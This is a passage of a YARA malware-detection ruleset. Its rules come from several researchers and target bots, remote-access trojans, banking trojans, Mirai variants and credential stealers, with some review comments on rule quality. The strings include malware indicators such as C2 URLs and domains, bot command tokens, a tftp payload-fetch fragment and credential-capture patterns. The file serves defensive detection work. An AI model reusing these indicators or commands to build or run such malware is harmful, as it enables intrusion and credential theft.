        // central directory (which carries member names) sits at the end of the archive.
        $hdr at 0 and (($e1 in (filesize-100..filesize)) or ($e2 in (filesize-100..filesize)))
}

rule MedussaHTTP_2019
{
    meta:
        author = "J from THL <j@techhelplist.com>"
        date = "2019-08-12"
        reference1 = "https://app.any.run/tasks/68c8f400-eba5-4d6c-b1f1-8b07d4c014a4/"
        reference2 = "https://www.netscout.com/blog/asert/medusahttp-ddos-slithers-back-spotlight"
        reference3 = "https://twitter.com/malware_traffic/status/1161034462983008261"
        version = 1
        maltype = "Bot"
        filetype = "memory"
        description = "MedussaHTTP v20190812"
    strings:
        $text01 = "|check|" ascii
        $text02 = "POST!" ascii
        $text03 = "httpactive" ascii
        $text04 = "httpstrong" ascii
        $text05 = "httppost" ascii
        $text06 = "slavicdragon" ascii
        $text07 = "slavicnodragon" ascii
        $text08 = "smartflood" ascii
        $text09 = "stop-all" ascii
        $text10 = "botkill" ascii
        $text11 = "updatehash" ascii
        $text12 = "xyz=" ascii
        $text13 = "abc=" ascii
    condition:
        9 of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

import "pe"

rule Trojan_W32_Gh0stMiancha_1_0_0
{
    meta:
        Author = "Context Threat Intelligence"
        Date = "2014/01/27"
        Description = "Bytes inside"
        Reference = "http://www.contextis.com/documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf"
    strings:
        // Each $Nx string is the corresponding plain string under a single-byte XOR
        // (0x14: compare $2 "DllCanLoadNow" with $2x byte for byte).
        $0x = { 57 5b 5a 5a 51 57 40 34 31 67 2e 31 70 34 5c 40 40 44 3b 25 3a 19 1e 5c 7b 67 60 2e 34 31 67 2e 31 70 19 1e 55 77 77 71 64 60 2e 34 3e 3b 3e 19 1e 57 7b 7a 60 71 7a 60 39 40 6d 64 71 2e 34 60 71 6c 60 3b 7c 60 79 78 19 1e 44 66 7b 6c 6d 39 57 7b 7a 7a 71 77 60 7d 7b 7a 2e 34 5f 71 71 64 39 55 78 7d 62 71 19 1e 57 7b 7a 60 71 7a 60 39 78 71 7a 73 60 7c 2e 34 24 19 1e 19 1e }
        $1 = { 5c e7 99 bd e5 8a a0 e9 bb 91 5c }
        $1x = { 48 f3 8d a9 f1 9e b4 fd af 85 48 }
        $2 = "DllCanLoadNow"
        $2x = { 50 78 78 57 75 7a 58 7b 75 70 5a 7b 63 }
        $3x = { 5a 61 79 76 71 66 34 7b 72 34 67 61 76 7f 71 6d 67 2e 34 31 70 }
        $4 = "JXNcc2hlbGxcb3Blblxjb21tYW5k"
        $4x = { 5e 4c 5a 77 77 26 7c 78 76 53 6c 77 76 27 56 78 76 78 6c 7e 76 26 25 60 4d 43 21 7f }
        $5 = "SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA=="
        $5x = { 47 51 52 47 46 52 70 56 41 7f 42 77 46 51 42 40 45 25 5e 5e 41 52 46 5e 40 24 21 77 41 27 78 6e 70 53 42 60 4c 51 5a 78 76 7a 46 6d 4d 43 6c 45 77 79 2d 7e 4e 4c 5a 6e 76 27 5e 77 59 55 29 29 }
        $6 = "C:\\Users\\why\\"
        $6x = { 57 2e 48 41 67 71 66 67 48 63 7c 6d 48 }
        $7 = "g:\\ykcx\\"
        $7x = { 73 2E 48 6D 7F 77 6C 48 }
        $8 = "(miansha)"
        $8x = { 3C 79 7D 75 7A 67 7C 75 3D }
        $9 = "server(\xE5\xA3\xB3)"
        $9x = { 7C 2E 48 26 24 25 27 3A 25 25 3A 26 21 48 67 71 66 62 71 66 3C F1 B7 A7 3D 48 46 71 78 71 75 67 71 48 67 71 66 62 71 66 3A 64 70 76 }
        // Config-decode loop: `add dl, 0x7a` / `xor dl, 0x19` on each byte, then inc ecx / cmp ecx, esi / jl.
        $cfgDecode = { 8a ?? ?? 80 c2 7a 80 f2 19 88 ?? ?? 41 3b ce 7c ??}
    condition:
        any of them
}

rule MiniAsp3_mem : memory
{
    meta:
        author = "chort (@chort0)"
        description = "Detect MiniASP3 in memory"
    strings:
        $pdb = "MiniAsp3\\Release\\MiniAsp.pdb" fullword
        $httpAbout = "http://%s/about.htm" fullword
        $httpResult = "http://%s/result_%s.htm" fullword
        // NOTE(review): the trailing ellipsis is a multi-byte UTF-8 character, not three
        // ASCII dots; if the binary emits "..." this string never matches — verify against a sample.
        $msgInetFail = "open internet failed…" fullword
        $msgRunErr = "run error!" fullword
        $msgRunOk = "run ok!" fullword
        $msgTimeOutM0 = "time out,change to mode 0" fullword
        $msgCmdNull = "command is null!" fullword
    condition:
        ($pdb and (all of ($http*)) and any of ($msg*))
}

/*
    Yara rule to detect Mirai Okiru generic
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

rule Mirai_Okiru
{
    meta:
        description = "Detects Mirai Okiru MALW"
        reference = "https://www.reddit.com/r/LinuxMalware/comments/7p00i3/quick_notes_for_okiru_satori_variant_of_mirai/"
        date = "2018-01-05"
    strings:
        $hexsts01 = { 68 7f 27 70 60 62 73 3c 27 28 65 6e 69 28 65 72 }
        $hexsts02 = { 74 7e 65 68 7f 27 73 61 73 77 3c 27 28 65 6e 69 }
        // noted some Okiru variant doesnt have below function, uncomment to seek specific x86 bins
        // $st07 = "iptables -F\n" fullword nocase wide ascii
    condition:
        // Relies on is__elf and is__Mirai_gen7 defined earlier in this file.
        all of them and is__elf and is__Mirai_gen7 and filesize < 100KB
}

/*
    Yara rule to detect Mirai Satori generic
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
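*/

private rule is__Mirai_Satori_gen
{
    meta:
        description = "Detects Mirai Satori_gen"
        reference = "https://www.reddit.com/r/LinuxMalware/comments/7p00i3/quick_notes_for_okiru_satori_variant_of_mirai/"
        date = "2018-01-05"
    strings:
        $st08 = "tftp -r satori" fullword nocase wide ascii
        $st09 = "/bins/satori" fullword nocase wide ascii
        // NOTE(review): $st10 and $st11 are identical under `nocase`, so a single
        // "satori" token already satisfies "2 of them"; the threshold is weaker than it reads.
        $st10 = "satori" fullword nocase wide ascii
        $st11 = "SATORI" fullword nocase wide ascii
    condition:
        2 of them
}

rule Mirai_Satori
{
    meta:
        description = "Detects Mirai Satori MALW"
        date = "2018-01-09"
    strings:
        $hexsts01 = { 63 71 75 ?? 62 6B 77 62 75 }
        $hexsts02 = { 53 54 68 72 75 64 62 }
        $hexsts03 = { 28 63 62 71 28 70 66 73 64 6F 63 68 60 }
    condition:
        // is__elf and is__Mirai_gen7 are defined earlier in this file.
        all of them and is__elf and is__Mirai_gen7 and is__Mirai_Satori_gen and filesize < 100KB
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

import "pe"

rule tran_duy_linh
{
    meta:
        author = "@patrickrolsen"
        maltype = "Misc."
        version = "0.2"
        reference = "8fa804105b1e514e1998e543cd2ca4ea, 872876cfc9c1535cd2a5977568716ae1, etc."
        date = "01/03/2014"
    strings:
        $doc = {D0 CF 11 E0} //DOCFILE0 (OLE compound file header)
        $string1 = "Tran Duy Linh" fullword
        $string2 = "DLC Corporation" fullword
    condition:
        ($doc at 0) and (all of ($string*))
}

rule misc_iocs
{
    meta:
        author = "@patrickrolsen"
        maltype = "Misc."
        version = "0.1"
        reference = "N/A"
    strings:
        $doc = {D0 CF 11 E0} //DOCFILE0 (OLE compound file header)
        $s1 = "dw20.exe"
        // "cmd /" is a short, generic token; with "1 of ($s*)" expect hits on benign OLE documents.
        $s2 = "cmd /"
    condition:
        ($doc at 0) and (1 of ($s*))
}

rule malicious_LNK_files
{
    meta:
        author = "@patrickrolsen"
    strings:
        // Shell Link header: HeaderSize 0x4C followed by the first bytes of the ShellLink CLSID.
        $magic = {4C 00 00 00 01 14 02 00} // L.......
        $s1 = "\\RECYCLER\\" wide
        $s2 = "%temp%" wide
        $s3 = "%systemroot%\\system32\\cmd.exe" wide
        //$s4 = "./start" wide
        $s5 = "svchost.exe" wide
        $s6 = "lsass.exe" wide
        $s7 = "csrss.exe" wide
        $s8 = "winlogon.exe" wide
        //$s9 = "%cd%" wide
        $s10 = "%appdata%" wide
        $s11 = "%programdata%" wide
        $s12 = "%localappdata%" wide
        $s13 = ".cpl" wide
    condition:
        ($magic at 0) and any of ($s*)
}

rule memory_pivy
{
    meta:
        author = "https://github.com/jackcr/"
    strings:
        // "StubPath" preceded by a run of NUL bytes.
        $a = {00 00 00 00 00 00 00 00 00 00 00 53 74 75 62 50 61 74 68 00} // presence of pivy in memory
    condition:
        any of them
}

rule memory_shylock
{
    meta:
        author = "https://github.com/jackcr/"
    strings:
        $a = /pipe\\[A-F0-9]{32}/ //Named pipe created by the malware
        $b = /id=[A-F0-9]{32}/ //Portion or the uri beacon
        $c = /MASTER_[A-F0-9]{32}/ //Mutex created by the malware
        $d = "***Load injects by PIPE (%s)" //String found in binary
        $e = "***Load injects url=%s (%s)" //String found in binary
        $f = "*********************** Ping Ok ************************" //String found in binary
        $g = "*** LOG INJECTS *** %s" //String found in binary
    condition:
        any of them
}

rule ScanBox_Malware_Generic
{
    meta:
        description = "Scanbox Chinese Deep Panda APT Malware http://goo.gl/MUUfjv and http://goo.gl/WXUQcP"
        author = "Florian Roth"
        reference1 = "http://goo.gl/MUUfjv"
        reference2 = "http://goo.gl/WXUQcP"
        date = "2015/02/28"
        hash1 = "8d168092d5601ebbaed24ec3caeef7454c48cf21366cd76560755eb33aff89e9"
        hash2 = "d4be6c9117db9de21138ae26d1d0c3cfb38fd7a19fa07c828731fa2ac756ef8d"
        hash3 = "3fe208273288fc4d8db1bf20078d550e321d9bc5b9ab80c93d79d2cb05cbf8c2"
    strings:
        /* Sample 1 */
        $s0 = "http://142.91.76.134/p.dat" fullword ascii
        $s1 = "HttpDump 1.1" fullword ascii
        /* Sample 2 */
        $s3 = "SecureInput .exe" fullword wide
        $s4 = "http://extcitrix.we11point.com/vpn/index.php?ref=1" fullword ascii
        /* Sample 3 */
        $s5 = "%SystemRoot%\\System32\\svchost.exe -k msupdate" fullword ascii
        $s6 = "ServiceMaix" fullword ascii
        /* Certificate and Keywords */
        // NOTE(review): this literal was wrapped mid-string in the rendered source;
        // a single space is assumed — verify against the original rule file.
        $x1 = "Management Support Team1" fullword ascii
        $x2 = "DTOPTOOLZ Co.,Ltd.0" fullword ascii
        $x3 = "SEOUL1" fullword ascii
    condition:
        ( 1 of ($s*) and 2 of ($x*) ) or ( 3 of ($x*) )
}

rule TrojanDownloader
{
    meta:
        description = "Trojan Downloader - Flash Exploit Feb15"
        author = "Florian Roth"
        reference = "http://goo.gl/wJ8V1I"
        date = "2015/02/11"
        hash = "5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e"
        score = 60
    strings:
        $x1 = "Hello World!" fullword ascii
        $x2 = "CONIN$" fullword ascii
        // The $s* strings are ordinary Win32 import names; the two $x* markers
        // and the size cap carry the specificity.
        $s6 = "GetCommandLineA" fullword ascii
        $s7 = "ExitProcess" fullword ascii
        $s8 = "CreateFileA" fullword ascii
        $s5 = "SetConsoleMode" fullword ascii
        $s9 = "TerminateProcess" fullword ascii
        $s10 = "GetCurrentProcess" fullword ascii
        $s11 = "UnhandledExceptionFilter" fullword ascii
        $s3 = "user32.dll" fullword ascii
        $s16 = "GetEnvironmentStrings" fullword ascii
        $s2 = "GetLastActivePopup" fullword ascii
        $s17 = "GetFileType" fullword ascii
        $s19 = "HeapCreate" fullword ascii
        $s20 = "VirtualFree" fullword ascii
        $s21 = "WriteFile" fullword ascii
        $s22 = "GetOEMCP" fullword ascii
        $s23 = "VirtualAlloc" fullword ascii
        $s24 = "GetProcAddress" fullword ascii
        $s26 = "FlushFileBuffers" fullword ascii
        $s27 = "SetStdHandle" fullword ascii
        $s28 = "KERNEL32.dll" fullword ascii
    condition:
        $x1 and $x2 and ( all of ($s*) ) and filesize < 35000
}

rule Cloaked_as_JPG
{
    meta:
        description = "Detects a cloaked file as JPG"
        author = "Florian Roth (eval section from Didier Stevens)"
        date = "2015/02/29"
        score = 70
    strings:
        $ext = "extension: .jpg"
    condition:
        // A ".jpg" extension marker on a file that does not start with the JPEG SOI bytes FF D8.
        $ext and uint16be(0x00) != 0xFFD8
}

rule rtf_yahoo_ken
{
    meta:
        author = "@patrickrolsen"
        maltype = "Yahoo Ken"
        filetype = "RTF"
        version = "0.1"
        description = "Test rule"
        date = "2013-12-14"
    strings:
        $magic1 = { 7b 5c 72 74 30 31 } // {\rt01
        $magic2 = { 7b 5c 72 74 66 31 } // {\rtf1
        $magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3
        // NOTE(review): these bytes decode to "yahoo kec" (6b 65 63), not "yahoo ken"
        // as the trailing comment says; bytes left as-is — confirm against a sample.
        $author1 = { 79 61 68 6f 6f 20 6b 65 63 } // "yahoo ken"
    condition:
        // `at 0` binds only to its own string, so the original
        // `($magic1 or $magic2 or $magic3 at 0)` let $magic1/$magic2 match at any offset.
        // All three are RTF headers, so each is anchored to the file start.
        ($magic1 at 0 or $magic2 at 0 or $magic3 at 0) and $author1
}

rule ZXProxy
{
    meta:
        author = "ThreatConnect Intelligence Research Team"
    strings:
        $C = "\\Control\\zxplug" nocase wide ascii
        $h = "http://www.facebook.com/comment/update.exe" wide ascii
        $S = "Shared a shell to %s:%s Successfully" nocase wide ascii
    condition:
        any of them
}

rule OrcaRAT
{
    meta:
        Author = "PwC Cyber Threat Operations"
        Date = "2014/10/20"
        Description = "Strings inside"
        Reference = "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html"
    strings:
        $MZ = "MZ"
        $apptype1 = "application/x-ms-application"
        $apptype2 = "application/x-ms-xbap"
        $apptype3 = "application/vnd.ms-xpsdocument"
        $apptype4 = "application/xaml+xml"
        $apptype5 = "application/x-shockwave-flash"
        $apptype6 = "image/pjpeg"
        $err1 = "Set return time error = %d!"
        $err2 = "Set return time success!"
        $err3 = "Quit success!"
    condition:
        $MZ at 0 and filesize < 500KB and (all of ($apptype*) and 1 of ($err*))
}

rule EmiratesStatement
{
    meta:
        Author = "Christiaan Beek"
        Date = "2013-06-30"
        Description = "Credentials Stealing Attack"
        Reference = "https://blogs.mcafee.com/mcafee-labs/targeted-campaign-steals-credentials-in-gulf-states-and-caribbean"
        hash0 = "0e37b6efe5de1cc9236017e003b1fc37"
        hash1 = "a28b22acf2358e6aced43a6260af9170"
        hash2 = "6f506d7adfcc2288631ed2da37b0db04"
        hash3 = "8aebade47dc1aa9ac4b5625acf5ade8f"
    strings:
        $string0 = "msn.klm"
        $string1 = "wmsn.klm"
        $string2 = "bms.klm"
    condition:
        all of them
}

rule PUP_InstallRex_AntiFWb
{
    meta:
        description = "Malware InstallRex / AntiFW"
        author = "Florian Roth"
        date = "2015-05-13"
        hash = "bb5607cd2ee51f039f60e32cf7edc4e21a2d95cd"
        score = 65
    strings:
        $s4 = "Error %u while loading TSU.DLL %ls" fullword ascii
        $s7 = "GetModuleFileName() failed => %u" fullword ascii
        $s8 = "TSULoader.exe" fullword wide
        $s15 = "\\StringFileInfo\\%04x%04x\\Arguments" fullword wide
        $s17 = "Tsu%08lX.dll" fullword wide
    condition:
        // 0x5a4d little-endian is "MZ".
        uint16(0) == 0x5a4d and all of them
}

rule LightFTP_fftp_x86_64
{
    meta:
        description = "Detects a light FTP server"
        author = "Florian Roth"
        reference = "https://github.com/hfiref0x/LightFTP"
        date = "2015-05-14"
        hash1 = "989525f85abef05581ccab673e81df3f5d50be36"
        hash2 = "5884aeca33429830b39eba6d3ddb00680037faf4"
        score = 50
    strings:
        $s1 = "fftp.cfg" fullword wide
        $s2 = "220 LightFTP server v1.0 ready" fullword ascii
        $s3 = "*FTP thread exit*" fullword wide
        $s4 = "PASS->logon successful" fullword ascii
        $s5 = "250 Requested file action okay, completed." fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 250KB and 4 of them
}

rule LightFTP_Config
{
    meta:
        description = "Detects a light FTP server - config file"
        author = "Florian Roth"
        reference = "https://github.com/hfiref0x/LightFTP"
        date = "2015-05-14"
        hash = "ce9821213538d39775af4a48550eefa3908323c5"
    strings:
        $s2 = "maxusers=" wide
        $s6 = "[ftpconfig]" fullword wide
        $s8 = "accs=readonly" fullword wide
        $s9 = "[anonymous]" fullword wide
        $s10 = "accs=" fullword wide
        $s11 = "pswd=" fullword wide
    condition:
        // 0xfeff read little-endian is the UTF-16LE byte-order mark (FF FE).
        uint16(0) == 0xfeff and filesize < 1KB and all of them
}

rule SpyGate_v2_9
{
    meta:
        date = "2014/09"
        maltype = "Spygate v2.9 Remote Access Trojan"
        filetype = "exe"
        reference = "https://blogs.mcafee.com/mcafee-labs/middle-east-developer-spygate-struts-stuff-online"
    strings:
        $1 = "shutdowncomputer" wide
        $2 = "shutdown -r -t 00" wide
        $3 = "blockmouseandkeyboard" wide
        $4 = "ProcessHacker"
        $5 = "FileManagerSplit" wide
    condition:
        all of them
}

rule ice_ix_12xy : banker
{
    meta:
        author = "Jean-Philippe Teissier / @Jipe_"
        description = "ICE-IX 1.2.x.y trojan banker"
        date = "2013-01-12"
        filetype = "memory"
        version = "1.0"
    strings:
        $regexp1= /bn1=.{32}&sk1=[0-9a-zA-Z]{32}/
        $a = "bn1="
        $b = "&sk1="
        $c = "mario" //HardDrive GUID artifact
        $d = "FIXME"
        $e = "RFB 003.003" //VNC artifact
        $ggurl = "http://www.google.com/webhp"
    condition:
        $regexp1 or ($a and $b) or all of ($c,$d,$e,$ggurl)
}

rule qadars : banker
{
    meta:
        author = "Jean-Philippe Teissier / @Jipe_"
        description = "Qadars - Mobile part. Maybe Perkele."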
version = "1.0" filetype = "memory" ref1 = "http://www.lexsi-leblog.fr/cert/qadars-nouveau-malware-bancaire-composant-mobile.html" strings: $cmd1 = "m?D" $cmd2 = "m?S" $cmd3 = "ALL" $cmd4 = "FILTER" $cmd5 = "NONE" $cmd6 = "KILL" $cmd7 = "CANCEL" $cmd8 = "SMS" $cmd9 = "DIVERT" $cmd10 = "MESS" $nofilter = "nofilter1111111" $botherderphonenumber1 = "+380678409210" condition: all of ($cmd*) or $nofilter or any of ($botherderphonenumber*) } rule shylock : banker { meta: author = "Jean-Philippe Teissier / @Jipe_" description = "Shylock Banker" date = "2013-12-12" version = "1.0" ref1 = "http://iocbucket.com/iocs/1b4660d57928df5ca843c21df0b2adb117026cba" ref2 = "http://www.trusteer.com/blog/merchant-fraud-returns-%E2%80%93-shylock-polymorphic-financial-malware-infections-rise" ref3 = "https://www.csis.dk/en/csis/blog/3811/" strings: $process1 = "MASTER" $process2 = "_SHUTDOWN" $process3 = "EVT_VNC" $process4 = "EVT_BACK" $process5 = "EVT_VNC" $process6 = "IE_Hook::GetRequestInfo" $process7 = "FF_Hook::getRequestInfo" $process8 = "EX_Hook::CreateProcess" $process9 = "hijackdll.dll" $process10 = "MTX_" $process11 = "FF::PR_WriteHook entry" $process12 = "FF::PR_WriteHook exit" $process13 = "HijackProcessAttach::*** MASTER *** MASTER *** MASTER *** %s PID=%u" $process14 = "HijackProcessAttach::entry" $process15 = "FF::BEFORE INJECT" $process16 = "FF::AFTER INJECT" $process17 = "IE::AFTER INJECT" $process18 = "IE::BEFORE INJECT" $process19 = "*** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** %s" $process20 = "*** LOG INJECTS *** %s" $process21 = "*** inject to process %s not allowed" $process22 = "*** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** %s" $process23 = ".?AVFF_Hook@@" $process24 = ".?AVIE_Hook@@" $process25 = "Inject::InjectDllFromMemory" $process26 = "BadSocks.dll" $domain1 = "extensadv.cc" $domain2 = "topbeat.cc" $domain3 = "brainsphere.cc" $domain4 = "commonworldme.cc" $domain5 
= "gigacat.cc" $domain6 = "nw-serv.cc" $domain7 = "paragua-analyst.cc" condition: 3 of ($process*) or any of ($domain*) } rule spyeye : banker { meta: author = "Jean-Philippe Teissier / @Jipe_" description = "SpyEye X.Y memory" date = "2012-05-23" version = "1.0" filetype = "memory" strings: $spyeye = "SpyEye" $a = "%BOTNAME%" $b = "globplugins" $c = "data_inject" $d = "data_before" $e = "data_after" $f = "data_end" $g = "bot_version" $h = "bot_guid" $i = "TakeBotGuid" $j = "TakeGateToCollector" $k = "[ERROR] : Omfg! Process is still active? Lets kill that mazafaka!" $l = "[ERROR] : Update is not successfull for some reason" $m = "[ERROR] : dwErr == %u" $n = "GRABBED DATA" condition: $spyeye or (any of ($a,$b,$c,$d,$e,$f,$g,$h,$i,$j,$k,$l,$m,$n)) } rule spyeye_plugins : banker { meta: author = "Jean-Philippe Teissier / @Jipe_" description = "SpyEye X.Y Plugins memory" date = "2012-05-23" version = "1.0" filetype = "memory" strings: $a = "webfakes.dll" $b = "config.dat" //may raise some FP $c = "collectors.txt" $d = "webinjects.txt" $e = "screenshots.txt" $f = "billinghammer.dll" $g = "block.dll" //may raise some FP $h = "bugreport.dll" //may raise some FP $i = "ccgrabber.dll" $j = "connector2.dll" $k = "creditgrab.dll" $l = "customconnector.dll" $m = "ffcertgrabber.dll" $n = "ftpbc.dll" $o = "rdp.dll" //may raise some FP $p = "rt_2_4.dll" $q = "socks5.dll" //may raise some FP $r = "spySpread.dll" $s = "w2chek4_4.dll" $t = "w2chek4_6.dll" condition: any of them } rule callTogether_certificate { meta: Author = "Fireeye Labs" Date = "2014/11/03" Description = "detects binaries signed with the CallTogether certificate" Reference = "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html" strings: $serial = { 45 21 56 C3 B3 FB 01 76 36 5B DB 5B 77 15 BC 4C } $o = "CallTogether, Inc." 
condition: $serial and $o } rule qti_certificate { meta: Author = "Fireeye Labs" Date = "2014/11/03" Description = "detects binaries signed with the QTI International Inc certificate" Reference = "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html" strings: $cn = "QTI International Inc" $serial = { 2e df b9 fd cf a0 0c cb 5a b0 09 ee 3a db 97 b9 } condition: $cn and $serial } rule DownExecute_A { meta: Author = "PwC Cyber Threat Operations :: @tlansec" Date = "2015/04/27" Description = "Malware is often wrapped/protected, best to run on memory" Reference = "http://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html" strings: $winver1 = "win 8.1" $winver2 = "win Server 2012 R2" $winver3 = "win Srv 2012" $winver4 = "win srv 2008 R2" $winver5 = "win srv 2008" $winver6 = "win vsta" $winver7 = "win srv 2003 R2" $winver8 = "win hm srv" $winver9 = "win Strg srv 2003" $winver10 = "win srv 2003" $winver11 = "win XP prof x64 edt" $winver12 = "win XP" $winver13 = "win 2000" $pdb1 = "D:\\Acms\\2\\docs\\Visual Studio 2013\\Projects\\DownloadExcute\\DownloadExcute\\Release\\DownExecute.pdb" $pdb2 = "d:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\writer.h" $pdb3 = ":\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\internal/stack.h" $pdb4 = "\\downloadexcute\\downexecute\\" $magic1 = "<Win Get Version Info Name Error" $magic2 = "P@$sw0rd$nd" $magic3 = "$t@k0v2rF10w" $magic4 = "|*|123xXx(Mutex)xXx321|*|6-21-2014-03:06PM" wide $str1 = "Download Excute" ascii wide fullword $str2 = "EncryptorFunctionPointer %d" $str3 = "%s\\%s.lnk" $str4 = "Mac:%s-Cpu:%s-HD:%s" $str5 = "feed back responce of host" $str6 = "GET Token at host" $str7 = "dwn md5 err" condition: all of ($winver*) or any of ($pdb*) or any of ($magic*) 
or 2 of ($str*) } rule CVE_2015_1674_CNGSYS { meta: description = "Detects exploits for CVE-2015-1674" author = "Florian Roth" reference = "http://www.binvul.com/viewthread.php?tid=508" reference2 = "https://github.com/Neo23x0/Loki/blob/master/signatures/exploit_cve_2015_1674.yar" date = "2015-05-14" hash = "af4eb2a275f6bbc2bfeef656642ede9ce04fad36" strings: $s1 = "\\Device\\CNG" fullword wide $s2 = "GetProcAddress" fullword ascii $s3 = "LoadLibrary" ascii $s4 = "KERNEL32.dll" fullword ascii $s5 = "ntdll.dll" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 60KB and all of them } rule Pandora { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/Pandora" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "Can't get the Windows version" $b = "=M=Q=U=Y=]=a=e=i=m=q=u=y=}=" $c = "JPEG error #%d" wide $d = "Cannot assign a %s to a %s" wide $g = "%s, ProgID:" $h = "clave" $i = "Shell_TrayWnd" $j = "melt.bat" $k = "\\StubPath" $l = "\\logs.dat" $m = "1027|Operation has been canceled!" $n = "466|You need to plug-in! Double click to install... 
|" $0 = "33|[Keylogger Not Activated!]" condition: all of them } rule Base64_encoded_Executable { meta: description = "Detects an base64 encoded executable (often embedded)" author = "Florian Roth" date = "2015-05-28" score = 50 strings: $s1 = "TVpTAQEAAAAEAAAA//8AALgAAAA" // 14 samples in goodware archive $s2 = "TVoAAAAAAAAAAAAAAAAAAAAAAAA" // 26 samples in goodware archive $s3 = "TVqAAAEAAAAEABAAAAAAAAAAAAA" // 75 samples in goodware archive $s4 = "TVpQAAIAAAAEAA8A//8AALgAAAA" // 168 samples in goodware archive $s5 = "TVqQAAMAAAAEAAAA//8AALgAAAA" // 28,529 samples in goodware archive condition: 1 of them } rule CredStealESY : For CredStealer { meta: description = "Generic Rule to detect the CredStealer Malware" author = "IsecG – McAfee Labs" date = "2015/05/08" strings: $my_hex_string = "CurrentControlSet\\Control\\Keyboard Layouts\\" wide //malware trying to get keyboard layout $my_hex_string2 = {89 45 E8 3B 7D E8 7C 0F 8B 45 E8 05 FF 00 00 00 2B C7 89 45 E8} //specific decryption module condition: $my_hex_string and $my_hex_string2 } rule Typical_Malware_String_Transforms { meta: description = "Detects typical strings in a reversed or otherwise modified form" author = "Florian Roth" reference = "Internal Research" date = "2016-07-31" score = 60 strings: /* Executables */ $e1 = "exe.tsohcvs" fullword ascii $e2 = "exe.ssasl" fullword ascii $e3 = "exe.rerolpxe" fullword ascii $e4 = "exe.erolpxei" fullword ascii $e5 = "exe.23lldnur" fullword ascii $e6 = "exe.dmc" fullword ascii $e7 = "exe.llikksat" fullword ascii /* Libraries */ $l1 = "lld.23lenreK" fullword ascii $l2 = "lld.ESABLENREK" fullword ascii $l3 = "lld.esabtpyrc" fullword ascii $l4 = "lld.trcvsm" fullword ascii $l5 = "LLD.LLDTN" fullword ascii /* Imports */ $i1 = "paeHssecorPteG" fullword ascii $i2 = "sserddAcorPteG" fullword ascii $i3 = "AyrarbiLdaoL" fullword ascii /* Registry */ $r1 = "teSlortnoCtnerruC" fullword ascii $r2 = "nuR\\noisreVtnerruC" fullword ascii /* Folders */ $f1 = "\\23metsys\\" ascii 
$f2 = "\\23metsyS\\" ascii $f3 = "niB.elcyceR$" fullword ascii $f4 = "%tooRmetsyS%" fullword ascii /* False Positives */ $fp1 = "Application Impact Telemetry Static Analyzer" fullword wide condition: ( uint16(0) == 0x5a4d and 1 of them and not 1 of ($fp*) ) } rule Invoke_mimikittenz { meta: description = "Detects Mimikittenz - file Invoke-mimikittenz.ps1" author = "Florian Roth" reference = "https://github.com/putterpanda/mimikittenz" date = "2016-07-19" score = 90 hash1 = "14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a" strings: $x1 = "[mimikittenz.MemProcInspector]" ascii $s1 = "PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |" fullword ascii $s2 = "IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);" fullword ascii $s3 = "&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=" ascii $s4 = "[DllImport(\"kernel32.dll\", SetLastError = true)]" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 60KB and 2 of them ) or $x1 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
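*/

import "pe"

// AES.DDoS Linux bot: three short markers, two of which suffice.
rule LinuxAESDDoS {
    meta:
        Author = "@benkow_"
        Date = "2014/09/12"
        Description = "Strings inside"
        Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
    strings:
        $a = "3AES"
        $b = "Hacker"
        $c = "VERSONEX"
    condition:
        2 of them
}

// BillGates Linux bot: fragments of the C++ class names CUpdateGates / CUpdateBill as they appear
// in mangled symbols ("12CUpdateGates" = length-prefixed identifier).
rule LinuxBillGates {
    meta:
        Author = "@benkow_"
        Date = "2014/08/11"
        Description = "Strings inside"
        Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429"
    strings:
        $a= "12CUpdateGates"
        $b= "11CUpdateBill"
    condition:
        $a and $b
}

// Elknot: mangled names of CUtility::DeCrypt and CThreadAttack::Start (both required).
rule LinuxElknot {
    meta:
        Author = "@benkow_"
        Date = "2013/12/24"
        Description = "Strings inside"
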